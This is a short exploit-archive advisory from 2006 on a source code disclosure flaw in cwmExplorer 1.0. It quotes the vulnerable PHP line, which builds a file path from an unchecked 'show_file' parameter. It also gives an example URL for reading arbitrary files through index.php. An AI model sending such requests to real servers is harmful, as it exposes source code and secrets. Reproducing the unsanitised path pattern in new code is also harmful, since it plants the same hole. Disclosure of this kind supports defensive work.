cwmExplorer 1.0 (show_file) Source Code Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : cwmExplorer 1.0 (show_file) Source Code Disclosure Vulnerability
# Published : 2006-12-19
# Author : ajann
# Previous Title : Serendipity <= 1.0.3 (comment.php) Local File Include Exploit
# Next Title : Azucar CMS <= 1.3 (admin/index_sitios.php) File Inclusion Vulnerability

*******************************************************************************************
# Title   :  cwmExplorer 1.0 (show_file) Source Code Disclosure Vulnerability
# Author  :  ajann
# Contact :  :(

*******************************************************************************************

[[ERROR]]]------------------------------------------------------
....
..
$datei = "dirs/".$d."/".$_GET[show_file];
....
..
[[ERROR]]]---------------------------------------------------------

Example:

//[path]/index.php?d=0&show_file=[file]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# www.Syue.com [2006-12-19]